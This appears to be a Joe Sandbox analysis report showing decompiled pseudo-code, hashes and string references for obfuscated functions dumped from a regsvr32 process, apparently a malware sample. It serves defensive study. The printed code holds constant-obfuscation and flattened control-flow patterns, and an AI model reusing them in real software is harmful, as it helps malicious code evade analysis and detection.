0x04b3a6a5
0x04b3a6ad
0x04b3a6b5
0x04b3a6bd
0x04b3a6c5
0x04b3a6c9
0x04b3a6d1
0x04b3a6d9
0x04b3a6e3
0x04b3a6e7
0x04b3a6ef
0x04b3a6f7
0x04b3a6ff
0x04b3a707
0x04b3a70b
0x04b3a70f
0x04b3a713
0x04b3a713
0x04b3a713
0x04b3a716
0x04b3a716
0x04b3a716
0x04b3a71b
0x00000000
0x04b3a71b
0x04b3a729
0x04b3a7f0
0x04b3a7f5
0x04b3a7f8
0x04b3a801
0x04b3a806
0x04b3a80b
0x00000000
0x04b3a72f
0x04b3a735
0x04b3a85f
0x04b3a73b
0x04b3a741
0x04b3a7bd
0x04b3a7c2
0x04b3a7c4
0x04b3a7c9
0x04b3a7cf
0x00000000
0x04b3a7cf
0x04b3a743
0x04b3a749
0x04b3a7a2
0x00000000
0x04b3a74b
0x04b3a751
0x04b3a77f
0x04b3a785
0x04b3a790
0x04b3a78d
0x04b3a78d
0x04b3a795
0x04b3a798
0x00000000
0x04b3a753
0x04b3a759
0x00000000
0x04b3a75f
0x04b3a770
0x04b3a775
0x04b3a778
0x04b3a713
0x04b3a713
0x04b3a713
0x04b3a716
0x04b3a716
0x00000000
0x04b3a716
0x04b3a713
0x04b3a759
0x04b3a751
0x04b3a749
0x04b3a741
0x04b3a735
0x04b3a867
0x04b3a870
0x04b3a870
0x04b3a823
0x04b3a828
0x04b3a830
0x04b3a835
0x04b3a838
0x04b3a83f
0x04b3a840
0x04b3a840
0x00000000
0x04b3a84c
0x04b3a716

Strings

kb, xrefs: 04B3A5BE
), xrefs: 04B3A51E
B:o, xrefs: 04B3A602

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )$B:o$kb
API String ID: 0-1085388577
Opcode ID: 8ce6a4e57fbda25759a067ab3e1ee4ca91e8980f5eab3f11ed6d93ac21e2c85a
Instruction ID: dd98b2be48391d397ecd3d7396a8c6bffd285a4f3938b64e92df3499d1163f67
Opcode Fuzzy Hash: 8ce6a4e57fbda25759a067ab3e1ee4ca91e8980f5eab3f11ed6d93ac21e2c85a
Instruction Fuzzy Hash: B2A131715083419FC3A8CF66C88941BBBF1FBC8758F109A2DF59A96260D3B19909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B4BEFD, Relevance: 4.0, Strings: 3, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B4BEFD(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v616;
				void* _t242;
				void* _t243;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t285;

				_v52 = 0xa5be;
				_t251 = 0x16;
				_v52 = _v52 / _t251;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x0005c33b;
				_v48 = 0xc42d20;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 + 0xffffc4d0;
				_v48 = _v48 ^ 0xfffeda29;
				_v72 = 0x4321a7;
				_v72 = _v72 | 0xa4ce3c40;
				_v72 = _v72 ^ 0xa4cab40f;
				_v24 = 0x227e38;
				_t25 =  &_v24; // 0x227e38
				_t252 = 0x2c;
				_v24 =  *_t25 * 0x3c;
				_t27 =  &_v24; // 0x227e38
				_v24 =  *_t27 * 0x66;
				_t29 =  &_v24; // 0x227e38
				_v24 =  *_t29 / _t252;
				_v24 = _v24 ^ 0x014a285a;
				_v60 = 0xfcfbbc;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x000d93d1;
				_v96 = 0xf80007;
				_v96 = _v96 + 0xaa36;
				_v96 = _v96 ^ 0x00fda443;
				_v80 = 0x5511cc;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0x00043fa8;
				_v88 = 0xbb6e3f;
				_v88 = _v88 + 0xffffbcf0;
				_v88 = _v88 ^ 0x00b4c382;
				_v8 = 0x49da65;
				_v8 = _v8 >> 3;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x0002f4aa;
				_v16 = 0xc843f1;
				_t253 = 0x50;
				_v16 = _v16 / _t253;
				_v16 = _v16 ^ 0x9e242cdc;
				_v16 = _v16 + 0xffff9a81;
				_v16 = _v16 ^ 0x9e230a73;
				_v36 = 0x2e6bc5;
				_v36 = _v36 | 0x2558a4e0;
				_v36 = _v36 + 0xfffff4e9;
				_v36 = _v36 ^ 0x257724e9;
				_v12 = 0x80a3b9;
				_t254 = 0x6f;
				_v12 = _v12 * 0x79;
				_v12 = _v12 + 0xffff3c67;
				_v12 = _v12 | 0xeef82a75;
				_v12 = _v12 ^ 0xfef88c24;
				_v68 = 0x7db499;
				_v68 = _v68 + 0xffff3f49;
				_v68 = _v68 ^ 0x007e0dc2;
				_v44 = 0x9f49e4;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x1368a87d;
				_v44 = _v44 ^ 0xfa51dcf6;
				_v64 = 0x98f463;
				_v64 = _v64 / _t254;
				_v64 = _v64 ^ 0x0008fd0c;
				_v76 = 0x12aedd;
				_v76 = _v76 + 0xf7e7;
				_v76 = _v76 ^ 0x001c1bc6;
				_v28 = 0x4e33bd;
				_t255 = 3;
				_v28 = _v28 / _t255;
				_t256 = 0x48;
				_v28 = _v28 / _t256;
				_t257 = 0x1b;
				_v28 = _v28 * 0x5d;
				_v28 = _v28 ^ 0x002c0e7b;
				_v20 = 0x6739f6;
				_v20 = _v20 * 0x51;
				_v20 = _v20 + 0x822b;
				_v20 = _v20 + 0xffff6302;
				_v20 = _v20 ^ 0x20a7052c;
				_v40 = 0xf776a1;
				_v40 = _v40 | 0xfaf9a8ad;
				_v40 = _v40 + 0xffffa6b3;
				_v40 = _v40 ^ 0xfaf95b8b;
				_v56 = 0xfd0dae;
				_v56 = _v56 / _t257;
				_t258 = 0x23;
				_v56 = _v56 / _t258;
				_v56 = _v56 ^ 0x000358d4;
				_v32 = 0xe62709;
				_v32 = _v32 + 0xffff3f09;
				_v32 = _v32 >> 8;
				_v32 = _v32 ^ 0x0009f673;
				_v92 = 0xdc059c;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x0dc87abe;
				_v84 = 0xab2272;
				_t259 = 0xb;
				_v84 = _v84 / _t259;
				_v84 = _v84 ^ 0x0001c613;
				_t285 =  *0x4b56214; // 0x0
				_t242 = E04B409DD(_v52, _t285 + 0x23c, _v48, _v72);
				_t293 = _a4 + 0x2c;
				_t243 = E04B5061D(_v24, _a4 + 0x2c, _t242, _v60, _v96);
				_t302 = _t243;
				if(_t243 != 0) {
					_push(_v16);
					_push(_v8);
					_push(_v88);
					E04B52D0A(_v12, _t302, _t293, _v68, _v44, _v64, _a8,  &_v616,  *((intOrPtr*)(_a8 + 0x3c)), E04B4E1F8(0x4b31000, _v80, _t302));
					E04B4FECB(_t246, _v76, _v28, _v20, _v40);
					E04B3D061( &_v616, _v56, _v32, _v92, _v84);
				}
				return 1;
			}

0x04b4bf06
0x04b4bf15
0x04b4bf1a
0x04b4bf1f
0x04b4bf23
0x04b4bf2a
0x04b4bf31
0x04b4bf35
0x04b4bf3c
0x04b4bf43
0x04b4bf4a
0x04b4bf51
0x04b4bf58
0x04b4bf5f
0x04b4bf63
0x04b4bf66
0x04b4bf69
0x04b4bf6d
0x04b4bf70
0x04b4bf77
0x04b4bf7a
0x04b4bf81
0x04b4bf88
0x04b4bf8c
0x04b4bf93
0x04b4bf9a
0x04b4bfa1
0x04b4bfa8
0x04b4bfaf
0x04b4bfb3
0x04b4bfba
0x04b4bfc1
0x04b4bfc8
0x04b4bfcf
0x04b4bfd6
0x04b4bfda
0x04b4bfde
0x04b4bfe2
0x04b4bfe9
0x04b4bff3
0x04b4bff8
0x04b4bffd
0x04b4c004
0x04b4c00b
0x04b4c012
0x04b4c019
0x04b4c020
0x04b4c027
0x04b4c02e
0x04b4c039
0x04b4c03a
0x04b4c03d
0x04b4c044
0x04b4c04b
0x04b4c052
0x04b4c059
0x04b4c060
0x04b4c067
0x04b4c06e
0x04b4c072
0x04b4c079
0x04b4c080
0x04b4c08c
0x04b4c08f
0x04b4c096
0x04b4c09f
0x04b4c0a6
0x04b4c0ad
0x04b4c0b9
0x04b4c0be
0x04b4c0c6
0x04b4c0cb
0x04b4c0d4
0x04b4c0d7
0x04b4c0da
0x04b4c0e1
0x04b4c0ec
0x04b4c0ef
0x04b4c0f6
0x04b4c0fd
0x04b4c104
0x04b4c10b
0x04b4c112
0x04b4c119
0x04b4c120
0x04b4c12e
0x04b4c134
0x04b4c139
0x04b4c13e
0x04b4c145
0x04b4c14c
0x04b4c153
0x04b4c157
0x04b4c15e
0x04b4c165
0x04b4c169
0x04b4c170
0x04b4c17a
0x04b4c17d
0x04b4c180
0x04b4c18d
0x04b4c19c
0x04b4c1ad
0x04b4c1b3
0x04b4c1bb
0x04b4c1bd
0x04b4c1c0
0x04b4c1c8
0x04b4c1cb
0x04b4c1fa
0x04b4c20d
0x04b4c224
0x04b4c22c
0x04b4c234

Strings

$w%, xrefs: 04B4C027
8~", xrefs: 04B4BF5F
', xrefs: 04B4C145

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: '$8~"$$w%
API String ID: 1586166983-1780403920
Opcode ID: fa002242f2283481923004b86e4f422720fa8809d5d975fefb997aa027dfc9cc
Instruction ID: 42d4b70e07f6861c5708c137cc6e5b6d997db2d562c4d419ba41f108f2e8f5dd
Opcode Fuzzy Hash: fa002242f2283481923004b86e4f422720fa8809d5d975fefb997aa027dfc9cc
Instruction Fuzzy Hash: CFA13171D0120DEBDF18CFE5D98A9DEBBB2FB44314F208059E511BA264D7B41A56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04B4D8DB, Relevance: 3.9, Strings: 3, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04B4D8DB(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t128;
				signed int _t142;
				signed int _t153;
				signed int _t155;
				signed int* _t163;
				void* _t164;
				signed int* _t167;

				_push(_a8);
				_t163 = __edx;
				_t153 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t128);
				_v104 = 0xcf676c;
				_t167 =  &(( &_v116)[4]);
				_v104 = _v104 + 0xb3f2;
				_v104 = _v104 | 0x988d6f24;
				_t164 = 0x3ef4407;
				_v104 = _v104 << 0xf;
				_v104 = _v104 ^ 0xbfbf0000;
				_v68 = 0xc42241;
				_v68 = _v68 + 0x399a;
				_v68 = _v68 ^ 0x00ce5291;
				_v88 = 0x75dd03;
				_v88 = _v88 + 0x7dba;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x0008d458;
				_v72 = 0x2f46be;
				_v72 = _v72 + 0xffffdb55;
				_v72 = _v72 ^ 0x002db90e;
				_v76 = 0x23e806;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x000f8af6;
				_v116 = 0x607e6d;
				_v116 = _v116 << 0x10;
				_v116 = _v116 + 0xffff6686;
				_v116 = _v116 | 0x3d181bb2;
				_v116 = _v116 ^ 0x7f71bdaf;
				_v96 = 0x2cc21a;
				_v96 = _v96 | 0xe9438a5f;
				_t155 = 0x3a;
				_v96 = _v96 * 0x13;
				_v96 = _v96 ^ 0x5347ec85;
				_v108 = 0xb3af1a;
				_v108 = _v108 / _t155;
				_v108 = _v108 + 0x8361;
				_v108 = _v108 | 0x789ced77;
				_v108 = _v108 ^ 0x789572df;
				_v92 = 0x2d2920;
				_v92 = _v92 * 0x2c;
				_v92 = _v92 * 0x1e;
				_v92 = _v92 ^ 0xe8dd3266;
				_v80 = 0xc07fec;
				_v80 = _v80 << 9;
				_v80 = _v80 ^ 0x80fbd8c8;
				_v112 = 0xa84277;
				_v112 = _v112 + 0xffffed27;
				_v112 = _v112 * 0x1b;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0c742dd9;
				_v64 = 0x297b8a;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x0005dd25;
				_v84 = 0x5c8db2;
				_v84 = _v84 + 0x6b9b;
				_v84 = _v84 + 0x3228;
				_v84 = _v84 ^ 0x0059c37f;
				_v100 = 0xb4d8ec;
				_v100 = _v100 << 1;
				_v100 = _v100 + 0xe9ba;
				_v100 = _v100 | 0x2516dceb;
				_v100 = _v100 ^ 0x257d75fc;
				do {
					while(_t164 != 0x3ef4407) {
						if(_t164 == 0x3f5e611) {
							_push(_t155);
							_push(_t155);
							_t142 = E04B3C5D8(_t163[1]);
							_t167 =  &(_t167[3]);
							 *_t163 = _t142;
							__eflags = _t142;
							if(__eflags != 0) {
								_t164 = 0xddf020d;
								continue;
							}
						} else {
							if(_t164 == 0x4994ece) {
								L04B4CAD5(_v64, _v84, __eflags, _v100, _t153 + 4,  &_v60);
							} else {
								if(_t164 == 0x4a51775) {
									_t155 = _t153;
									_t163[1] = E04B46187(_t155);
									_t164 = 0x3f5e611;
									continue;
								} else {
									if(_t164 == 0x9d156cc) {
										_t155 = _v108;
										L04B40A90(_t155, _v92, _v80,  &_v60, _v112,  *_t153);
										_t167 =  &(_t167[4]);
										_t164 = 0x4994ece;
										continue;
									} else {
										if(_t164 != 0xddf020d) {
											goto L13;
										} else {
											_t155 = _t163;
											L04B322A6(_t155, _v116,  &_v60, _v96);
											_t167 =  &(_t167[2]);
											_t164 = 0x9d156cc;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t163;
						_t127 =  *_t163 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					_t164 = 0x4a51775;
					 *_t163 =  *_t163 & 0x00000000;
					__eflags =  *_t163;
					_t163[1] = _v104;
					L13:
					__eflags = _t164 - 0xae42d9c;
				} while (__eflags != 0);
				goto L16;
			}

0x04b4d8e2
0x04b4d8e9
0x04b4d8eb
0x04b4d8ed
0x04b4d8f4
0x04b4d8f5
0x04b4d8f6
0x04b4d8fb
0x04b4d903
0x04b4d906
0x04b4d910
0x04b4d918
0x04b4d91d
0x04b4d927
0x04b4d92f
0x04b4d937
0x04b4d93f
0x04b4d947
0x04b4d94f
0x04b4d957
0x04b4d95c
0x04b4d964
0x04b4d96c
0x04b4d974
0x04b4d97c
0x04b4d984
0x04b4d989
0x04b4d991
0x04b4d999
0x04b4d99e
0x04b4d9a6
0x04b4d9ae
0x04b4d9b6
0x04b4d9be
0x04b4d9cd
0x04b4d9ce
0x04b4d9d2
0x04b4d9da
0x04b4d9e8
0x04b4d9ec
0x04b4d9f4
0x04b4d9fc
0x04b4da04
0x04b4da11
0x04b4da1a
0x04b4da1e
0x04b4da26
0x04b4da2e
0x04b4da33
0x04b4da3b
0x04b4da43
0x04b4da50
0x04b4da59
0x04b4da5d
0x04b4da65
0x04b4da6d
0x04b4da72
0x04b4da7a
0x04b4da82
0x04b4da8a
0x04b4da92
0x04b4da9a
0x04b4daa2
0x04b4daa6
0x04b4daae
0x04b4dab6
0x04b4dabe
0x04b4dabe
0x04b4dad0
0x04b4db5e
0x04b4db5f
0x04b4db63
0x04b4db68
0x04b4db6b
0x04b4db6d
0x04b4db6f
0x04b4db71
0x00000000
0x04b4db71
0x04b4dad2
0x04b4dad8
0x04b4dbaa
0x04b4dade
0x04b4dae4
0x04b4db3a
0x04b4db41
0x04b4db44
0x00000000
0x04b4dae6
0x04b4daec
0x04b4db27
0x04b4db2b
0x04b4db30
0x04b4db33
0x00000000
0x04b4daee
0x04b4daf0
0x00000000
0x04b4daf6
0x04b4db03
0x04b4db05
0x04b4db0a
0x04b4db0d
0x00000000
0x04b4db0d
0x04b4daf0
0x04b4daec
0x04b4dae4
0x04b4dad8
0x04b4dbb2
0x04b4dbb4
0x04b4dbb9
0x04b4dbb9
0x04b4dbc0
0x04b4dbc0
0x04b4db7c
0x04b4db81
0x04b4db81
0x04b4db84
0x04b4db87
0x04b4db87
0x04b4db87
0x00000000

Strings

m~`, xrefs: 04B4D991
)-, xrefs: 04B4DA04
(2, xrefs: 04B4DA8A

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )-$(2$m~`
API String ID: 0-2018184401
Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction ID: 78deb41c1e2c5de9c38d72e5cd39f63418cc07fdeac8cda4535b717ecc1839aa
Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction Fuzzy Hash: B77154B28083029FC354DF25D58945BBBF4FBC8358F004A6DF59A96260E3B1DA099F83

Uniqueness

Uniqueness Score: -1.00%

Function 04B49774, Relevance: 3.9, Strings: 3, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E04B49774(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* _t119;
				intOrPtr _t132;
				void* _t134;
				void* _t139;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;
				signed int* _t161;

				_push(_a24);
				_push(_a20);
				_push(1);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t119);
				_v16 = 0xc48506;
				_t161 =  &(( &_v52)[8]);
				_v16 = _v16 + 0xffffac5b;
				_v16 = _v16 ^ 0x00c0af73;
				_t158 = 0;
				_v36 = 0x37ec46;
				_t139 = 0x2fa1272;
				_t11 =  &_v36; // 0x37ec46
				_t154 = 0xf;
				_v36 =  *_t11 / _t154;
				_t155 = 0x17;
				_v36 = _v36 * 0x4d;
				_v36 = _v36 ^ 0x011f94eb;
				_v48 = 0x1c9307;
				_v48 = _v48 + 0xffff180a;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0x45e7;
				_v48 = _v48 ^ 0x000c030c;
				_v20 = 0x2c1c35;
				_v20 = _v20 * 0x1a;
				_v20 = _v20 ^ 0x04724ae3;
				_v52 = 0xfea2f7;
				_v52 = _v52 + 0xffffcd03;
				_v52 = _v52 << 0xf;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0374764b;
				_v24 = 0x4bca1;
				_v24 = _v24 + 0xffff92f8;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0004173d;
				_v28 = 0xca25f8;
				_v28 = _v28 ^ 0xf07fe4f1;
				_v28 = _v28 | 0xda5170b9;
				_v28 = _v28 ^ 0xfaf3c539;
				_v40 = 0x557f86;
				_v40 = _v40 / _t155;
				_v40 = _v40 | 0x36ce95b0;
				_v40 = _v40 + 0xffff3f34;
				_v40 = _v40 ^ 0x36c02d15;
				_v44 = 0x3d6d99;
				_t156 = 0x16;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x3bf21f86;
				_v32 = 0x4fb69d;
				_v32 = _v32 << 4;
				_v32 = _v32 / _t156;
				_v32 = _v32 ^ 0x00344331;
				_v8 = 0x9d9959;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000ae1f8;
				_v12 = 0x98829;
				_v12 = _v12 ^ 0xb9c9dda7;
				_v12 = _v12 ^ 0xb9cd803a;
				_t157 = _v4;
				do {
					while(_t139 != 0x2fa1272) {
						if(_t139 == 0x306b7e5) {
							E04B3F9C1(_v4, _v24, _v28, _v40, 1, _a24, 1, _a20, _t139, _v44, _v32);
							_t161 =  &(_t161[9]);
							_t139 = 0xc6d7030;
							_t158 =  !=  ? 1 : _t158;
							continue;
						} else {
							if(_t139 == 0x66d181a) {
								_t132 = E04B4BC6B();
								_t157 = _t132;
								if(_t132 != 0xffffffff) {
									_t139 = 0xc4ce558;
									continue;
								}
							} else {
								if(_t139 == 0xc4ce558) {
									_t134 = L04B372C4(_v36,  &_v4, _v48, _v20, _t157, _v52);
									_t161 =  &(_t161[4]);
									if(_t134 != 0) {
										_t139 = 0x306b7e5;
										continue;
									}
								} else {
									if(_t139 != 0xc6d7030) {
										goto L14;
									} else {
										E04B51538(_v8, _v12, _v4);
									}
								}
							}
						}
						L7:
						return _t158;
					}
					_t139 = 0x66d181a;
					L14:
				} while (_t139 != 0xa576bfc);
				goto L7;
			}

0x04b4977b
0x04b49781
0x04b49786
0x04b49787
0x04b4978b
0x04b4978c
0x04b49790
0x04b49791
0x04b49792
0x04b49797
0x04b4979f
0x04b497a2
0x04b497ac
0x04b497b4
0x04b497b6
0x04b497be
0x04b497c3
0x04b497c9
0x04b497ce
0x04b497d9
0x04b497dc
0x04b497e0
0x04b497e8
0x04b497f0
0x04b497f8
0x04b497fd
0x04b49805
0x04b4980d
0x04b4981a
0x04b4981e
0x04b49826
0x04b4982e
0x04b49836
0x04b4983b
0x04b49840
0x04b49848
0x04b49850
0x04b49858
0x04b4985d
0x04b49865
0x04b4986d
0x04b49875
0x04b4987d
0x04b49885
0x04b49895
0x04b49899
0x04b498a1
0x04b498a9
0x04b498b1
0x04b498be
0x04b498bf
0x04b498c3
0x04b498c8
0x04b498cd
0x04b498d5
0x04b498dd
0x04b498e8
0x04b498ec
0x04b498f4
0x04b498fc
0x04b49901
0x04b49909
0x04b49916
0x04b4991e
0x04b49926
0x04b4992a
0x04b4992a
0x04b49938
0x04b499d4
0x04b499d9
0x04b499dc
0x04b499e3
0x00000000
0x04b4993a
0x04b49940
0x04b4999b
0x04b499a0
0x04b499a5
0x04b499a7
0x00000000
0x04b499a7
0x04b49942
0x04b49948
0x04b49987
0x04b4998c
0x04b49991
0x04b49993
0x00000000
0x04b49993
0x04b4994a
0x04b49950
0x00000000
0x04b49956
0x04b49962
0x04b49967
0x04b49950
0x04b49948
0x04b49940
0x04b49969
0x04b49971
0x04b49971
0x04b499eb
0x04b499f0
0x04b499f0
0x00000000

Strings

F7, xrefs: 04B497C3
1C4, xrefs: 04B498EC
E, xrefs: 04B497FD

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1C4$F7$E
API String ID: 0-3303878784
Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction ID: 2afbd394d4c7e655a5634a5602a80cfa04a421f6d9be2669d6292afb5689cae0
Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction Fuzzy Hash: 525163B2109381AFD358CF65D98981FBBE1FBD8748F405A1DF19696260E370DA09DB83

Uniqueness

Uniqueness Score: -1.00%

Function 04B3B820, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04B3B820(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t192;
				intOrPtr* _t193;
				intOrPtr _t194;
				signed int* _t196;

				_t196 =  &_v68;
				_v16 = 0xd87d65;
				_v12 = 0x358b32;
				_v8 = 0xe06945;
				_t192 =  *0x4b56210; // 0x0
				_v4 = 0;
				_t162 = __ecx;
				_v68 = 0xf23e36;
				_t193 = _t192 + 0x210;
				_v68 = _v68 ^ 0x9abe7b4c;
				_t164 = 0x28;
				_v68 = _v68 / _t164;
				_v68 = _v68 + 0xffff9758;
				_v68 = _v68 ^ 0x03db1914;
				_v28 = 0x153966;
				_v28 = _v28 + 0xc98d;
				_v28 = _v28 ^ 0x00189a49;
				_v32 = 0x66a403;
				_v32 = _v32 + 0x4aa1;
				_v32 = _v32 ^ 0x006148cf;
				_v44 = 0xfe7e73;
				_v44 = _v44 + 0xffff9639;
				_v44 = _v44 | 0x437ec796;
				_v44 = _v44 ^ 0x43f7a292;
				_v48 = 0x44000d;
				_t165 = 0x26;
				_v48 = _v48 / _t165;
				_v48 = _v48 | 0x123d3176;
				_v48 = _v48 ^ 0x1230a07a;
				_v60 = 0x1c671b;
				_v60 = _v60 | 0x089dc1d7;
				_t166 = 0x64;
				_v60 = _v60 / _t166;
				_t167 = 0x5e;
				_v60 = _v60 * 0x62;
				_v60 = _v60 ^ 0x087e3283;
				_v24 = 0x917945;
				_v24 = _v24 ^ 0x5fcd23bd;
				_v24 = _v24 ^ 0x5f54fdfa;
				_v64 = 0xfb1c79;
				_v64 = _v64 ^ 0x3af08dd4;
				_v64 = _v64 + 0x24a6;
				_v64 = _v64 + 0xffffe057;
				_v64 = _v64 ^ 0x3a029534;
				_v36 = 0xae1548;
				_v36 = _v36 * 0x1a;
				_v36 = _v36 + 0x68c6;
				_v36 = _v36 ^ 0x11a48673;
				_v40 = 0xac750c;
				_v40 = _v40 ^ 0x67c11f84;
				_v40 = _v40 | 0x960dc624;
				_v40 = _v40 ^ 0xf7630ea5;
				_v52 = 0x5bbbfa;
				_v52 = _v52 / _t167;
				_v52 = _v52 + 0xc5b0;
				_v52 = _v52 ^ 0x922587b4;
				_v52 = _v52 ^ 0x922f6435;
				_v56 = 0xb91e06;
				_t168 = 0x13;
				_v56 = _v56 / _t168;
				_v56 = _v56 + 0x7f58;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x002d76eb;
				_v20 = 0xce5e52;
				_t169 = 0x56;
				_v20 = _v20 / _t169;
				_v20 = _v20 ^ 0x000b3737;
				while(1) {
					_t194 =  *_t193;
					if(_t194 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t194 + 0x38)) == 0) {
						L4:
						 *_t193 =  *((intOrPtr*)(_t194 + 0x24));
						_t158 = L04B52B09(_v52, _t194, _v56, _v20);
					} else {
						_t158 = E04B51028(_v28, _v32,  *((intOrPtr*)(_t194 + 0x48)), _t162, _v44, _v48);
						_t196 =  &(_t196[4]);
						if(_t158 != _v68) {
							_t193 = _t194 + 0x24;
						} else {
							 *((intOrPtr*)(_t194 + 0x2c))( *((intOrPtr*)(_t194 + 0x38)), 0, 0);
							E04B3F0E9(_v72,  *((intOrPtr*)(_t194 + 0x38)), _v36, _v76);
							E04B51538(_v48, _v52,  *((intOrPtr*)(_t194 + 0x48)));
							_t196 =  &(_t196[3]);
							goto L4;
						}
					}
				}
				return _t158;
			}

0x04b3b820
0x04b3b823
0x04b3b82d
0x04b3b835
0x04b3b841
0x04b3b849
0x04b3b84d
0x04b3b84f
0x04b3b857
0x04b3b85d
0x04b3b86b
0x04b3b870
0x04b3b876
0x04b3b87e
0x04b3b886
0x04b3b88e
0x04b3b896
0x04b3b89e
0x04b3b8a6
0x04b3b8ae
0x04b3b8b6
0x04b3b8be
0x04b3b8c6
0x04b3b8ce
0x04b3b8d6
0x04b3b8e2
0x04b3b8e7
0x04b3b8ed
0x04b3b8f5
0x04b3b8fd
0x04b3b905
0x04b3b911
0x04b3b916
0x04b3b921
0x04b3b922
0x04b3b926
0x04b3b92e
0x04b3b936
0x04b3b93e
0x04b3b946
0x04b3b94e
0x04b3b956
0x04b3b95e
0x04b3b966
0x04b3b96e
0x04b3b97b
0x04b3b97f
0x04b3b987
0x04b3b98f
0x04b3b997
